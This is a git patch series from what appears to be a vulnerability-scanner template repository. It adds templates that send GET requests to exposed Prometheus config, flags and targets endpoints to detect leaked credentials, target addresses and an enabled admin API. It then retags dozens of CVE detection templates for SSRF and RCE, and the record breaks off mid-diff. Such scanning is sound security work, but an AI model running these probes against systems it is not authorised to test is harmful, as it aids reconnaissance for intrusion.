a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml new file mode 100644 index 0000000000..4529496b0d --- /dev/null +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -0,0 +1,26 @@ +id: prometheus-config-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus config API endpoint + author: geeknik + description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: high + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/config" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - "job_name:" + - "params:" + - "module:" + - "targets:" + condition: and From a8a063d14c8d9504b20a2e44c47a7d7a885ac514 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:36:27 -0500 Subject: [PATCH 30/54] Create prometheus-flags-endpoint.yaml --- .../configs/prometheus-flags-endpoint.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/configs/prometheus-flags-endpoint.yaml diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml new file mode 100644 index 0000000000..e3471282be --- /dev/null +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -0,0 +1,24 @@ +id: prometheus-flags-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus flags API endpoint + author: geeknik + description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: medium + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/config" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - '"data":' + - '"config.file":' + condition: and From 0f20469e96bf1f83fddb0a9ac62e503e34c7328f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:43:36 -0500 Subject: [PATCH 31/54] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index e3471282be..bbb7d436bf 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/v1/status/config" + - "{{BaseURL}}/api/v1/status/flags" matchers-condition: and matchers: From 72805491d0ccef219a4eda007bf6c560ecdd5141 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:44:55 -0500 Subject: [PATCH 32/54] Create prometheus-targets-endpoint.yaml --- .../configs/prometheus-targets-endpoint.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/prometheus-targets-endpoint.yaml diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml new file mode 100644 index 0000000000..9d29d621c6 --- /dev/null +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -0,0 +1,25 @@ +id: prometheus-targets-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus targets API endpoint + author: geeknik + description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: high + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/targets" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - "Endpoint" + - "State" + - "Labels" + condition: and From 86a8332187c9535953c059bbc4394a06bd2ee32d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:51:11 -0500 Subject: [PATCH 33/54] Update prometheus-flags-endpoint.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit adding regex extractor to alert if `optional` Prometheus management API is enabled as per the linked reference article. 👍🏻 --- exposures/configs/prometheus-flags-endpoint.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index bbb7d436bf..f5a8d3a980 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -22,3 +22,9 @@ requests: - '"data":' - '"config.file":' condition: and + + extractors: + - type: regex + name: web_admin_enabled + regex: + - '\"web\.enable\-admin\-api\"\: \"true\"' From eac799774d2f870ae587ee493307accdd2320ab7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 14:36:49 -0500 Subject: [PATCH 34/54] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index f5a8d3a980..c249c865f3 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -22,7 +22,7 @@ requests: - '"data":' - '"config.file":' condition: and - + extractors: - type: regex name: web_admin_enabled From 33badb66d116333fcce3ef9115ce4e4803e96f5c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 02:10:26 +0530 Subject: [PATCH 35/54] oob tags update --- cves/2014/CVE-2014-4210.yaml | 2 +- cves/2015/CVE-2015-7450.yaml | 2 +- cves/2015/CVE-2015-8813.yaml | 2 +- cves/2017/CVE-2017-10271.yaml | 2 +- cves/2017/CVE-2017-12629.yaml | 2 +- cves/2017/CVE-2017-18638.yaml | 2 +- cves/2017/CVE-2017-3506.yaml | 2 +- cves/2017/CVE-2017-9506.yaml | 2 +- cves/2018/CVE-2018-1000600.yaml | 2 +- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-15517.yaml | 2 +- cves/2018/CVE-2018-16167.yaml | 2 +- cves/2019/CVE-2019-0193.yaml | 2 +- cves/2019/CVE-2019-17558.yaml | 2 +- cves/2019/CVE-2019-18394.yaml | 2 +- cves/2019/CVE-2019-2616.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-8451.yaml | 2 +- cves/2020/CVE-2020-10770.yaml | 2 +- cves/2020/CVE-2020-13117.yaml | 2 +- cves/2020/CVE-2020-25223.yaml | 2 +- cves/2020/CVE-2020-25506.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-28976.yaml | 2 +- cves/2020/CVE-2020-35713.yaml | 2 +- cves/2020/CVE-2020-6308.yaml | 2 +- cves/2020/CVE-2020-7247.yaml | 2 +- cves/2020/CVE-2020-7796.yaml | 2 +- cves/2020/CVE-2020-8813.yaml | 2 +- cves/2021/CVE-2021-1497.yaml | 2 +- cves/2021/CVE-2021-1498.yaml | 2 +- cves/2021/CVE-2021-21287.yaml | 2 +- cves/2021/CVE-2021-22214.yaml | 2 +- cves/2021/CVE-2021-24472.yaml | 2 +- cves/2021/CVE-2021-26855.yaml | 2 +- cves/2021/CVE-2021-31755.yaml | 2 +- cves/2021/CVE-2021-32305.yaml | 2 +- cves/2021/CVE-2021-32819.yaml | 2 +- cves/2021/CVE-2021-33357.yaml | 2 +- cves/2021/CVE-2021-33544.yaml | 2 +- cves/2021/CVE-2021-3577.yaml | 2 +- cves/2021/CVE-2021-36380.yaml | 2 +- cves/2021/CVE-2021-40438.yaml | 2 +- iot/targa-camera-ssrf.yaml | 2 +- misconfiguration/cloudflare-image-ssrf.yaml | 2 +- misconfiguration/linkerd-ssrf-detect.yaml | 2 +- misconfiguration/ssrf-via-oauth-misconfig.yaml | 2 +- vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml | 2 +- vulnerabilities/generic/oob-header-based-interaction.yaml | 2 +- vulnerabilities/generic/oob-param-based-interaction.yaml | 2 +- vulnerabilities/generic/request-based-interaction.yaml | 2 +- vulnerabilities/other/hashicorp-consul-rce.yaml | 2 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 +- vulnerabilities/other/netgear-wnap320-rce.yaml | 2 +- vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- vulnerabilities/other/visual-tools-dvr-rce.yaml | 2 +- vulnerabilities/other/zimbra-preauth-ssrf.yaml | 2 +- vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml | 2 +- 69 files changed, 69 insertions(+), 69 deletions(-) diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index df8ec6f136..96c90f1486 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,7 +4,7 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf,oob + tags: cve,cve2014,weblogic,oracle,ssrf,oast reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 04918de4f0..8f542a5c14 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce,oob + tags: cve,cve2015,websphere,deserialization,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index d9b0c56e21..2651aa807d 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -8,7 +8,7 @@ info: reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - tags: cve,cve2015,ssrf,oob + tags: cve,cve2015,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N cvss-score: 8.20 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 16be3163ce..86a37f5d34 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic,oob + tags: cve,cve2017,rce,oracle,weblogic,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.50 diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index 653122ae26..bcfeceeb5f 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -4,7 +4,7 @@ info: name: Apache Solr <= 7.1 XML entity injection author: dwisiswant0 severity: critical - tags: cve,cve2017,solr,apache,oob,xxe + tags: cve,cve2017,solr,apache,oast,xxe reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://twitter.com/honoki/status/1298636315613974532 diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index 8c240d1426..47bbe28842 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -10,7 +10,7 @@ info: - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 - tags: cve,cve2017,graphite,ssrf,oob + tags: cve,cve2017,graphite,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 0e0bff68e3..b19b9142da 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -5,7 +5,7 @@ info: author: pdteam description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: high - tags: cve,cve2017,weblogic,oracle,rce,oob + tags: cve,cve2017,weblogic,oracle,rce,oast reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index d97ed4f5c8..a76d387e75 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,7 +9,7 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf,oob + tags: cve,cve2017,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index b244248f80..e87764fc8b 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml @@ -8,7 +8,7 @@ info: - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ author: geeknik severity: high - tags: cve,cve2018,jenkins,ssrf,oob + tags: cve,cve2018,jenkins,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f134dc0cba..154d5bc397 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oob + tags: cve,cve2018,lg-nas,rce,oast requests: - raw: diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index ffe7f7ad24..a6c7089cc6 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -7,7 +7,7 @@ info: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt author: gy741 severity: high - tags: cve,cve2018,dlink,ssrf,oob + tags: cve,cve2018,dlink,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N cvss-score: 8.60 diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index da711614f9..905c2aa927 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oob + tags: cve,cve2018,logontracer,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 84af6836bc..9290b55d0a 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ - tags: cve,cve2019,apache,rce,solr,oob + tags: cve,cve2019,apache,rce,solr,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index dc6c7b9786..836b3efbdf 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -4,7 +4,7 @@ info: author: pikpikcu,madrobot severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - tags: cve,cve2019,apache,rce,solr,oob + tags: cve,cve2019,apache,rce,solr,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.50 diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 3c50ca751a..c50b26350b 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -8,7 +8,7 @@ info: reference: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - tags: cve,cve2019,ssrf,openfire,oob + tags: cve,cve2019,ssrf,openfire,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index e8c42482e2..cc8c1eda41 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oob + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 48d47fda95..bf1dcb703f 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oob + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 7fe324b099..9233fe022b 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 - tags: cve,cve2019,atlassian,jira,ssrf,oob + tags: cve,cve2019,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.50 diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml index f43f476f60..6e92956a36 100644 --- a/cves/2020/CVE-2020-10770.yaml +++ b/cves/2020/CVE-2020-10770.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.30 cve-id: CVE-2020-10770 cwe-id: CWE-601 - tags: keycloak,ssrf,oob,cve,cve2020 + tags: keycloak,ssrf,oast,cve,cve2020 requests: - method: GET diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 481f68259a..98efc7ace5 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -7,7 +7,7 @@ info: description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - tags: cve,cve2020,wavlink,rce,oob + tags: cve,cve2020,wavlink,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index adcb65ac0a..3e1e320fe2 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -7,7 +7,7 @@ info: description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 - tags: cve,cve2020,sophos,rce,oob + tags: cve,cve2020,sophos,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 2ee12a9f60..d70e43e555 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -8,7 +8,7 @@ info: reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,dlink,rce,oob + tags: cve,cve2020,dlink,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index 18174b37ea..a57eaa9237 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -8,7 +8,7 @@ info: reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - tags: cve,cve2020,netgear,rce,oob + tags: cve,cve2020,netgear,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 45c1ee460a..e0b08965cd 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -9,7 +9,7 @@ info: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - tags: cve,cve2020,terramaster,rce,oob + tags: cve,cve2020,terramaster,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index d8708d874c..8520809f13 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://www.exploit-db.com/exploits/48980 - tags: cve,cve2020,monitorr,rce,oob + tags: cve,cve2020,monitorr,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index a271437130..4e6105c4ea 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 - tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index fd466fe1a3..36714819c0 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oob,router + tags: cve,cve2020,linksys,rce,oast,router classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index 7ff8dd8f94..bb51b3b39a 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC - tags: cve,cve2020,sap,ssrf,oob + tags: cve,cve2020,sap,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f570b6ab86..28d754aeab 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 - tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + tags: cve,cve2020,smtp,opensmtpd,network,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 3c7e70486f..bf0dae4846 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -7,7 +7,7 @@ info: description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. reference: - https://www.adminxe.com/2183.html - tags: cve,cve2020,zimbra,ssrf,oob + tags: cve,cve2020,zimbra,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 988906da9e..d8ab5f4114 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -7,7 +7,7 @@ info: description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - 